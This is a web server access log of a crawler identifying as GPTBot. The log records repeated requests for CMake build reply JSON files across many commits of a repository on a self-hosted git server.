[Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:40:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:40:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35740] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:40:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35737] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:40:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 9992] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:18:40:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9996] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:40:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:18:40:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:40:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46761] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:40:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:40:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46761] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:40:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:40:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:40:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:40:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:40:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46760] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:40:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46758] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:40:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:40:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:40:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:40:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:40:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:40:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:18:40:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35738] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:40:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 9999] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:18:40:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35742] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:40:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:40:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9999] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:40:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:18:40:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 15213] [Gzip 10.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:18:40:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 9991] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:18:40:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:40:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35741] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:40:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:40:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9990] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:40:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46760] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:40:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:40:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46765] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:40:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:40:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:40:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:40:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 42760] [Gzip 21.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:18:40:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" 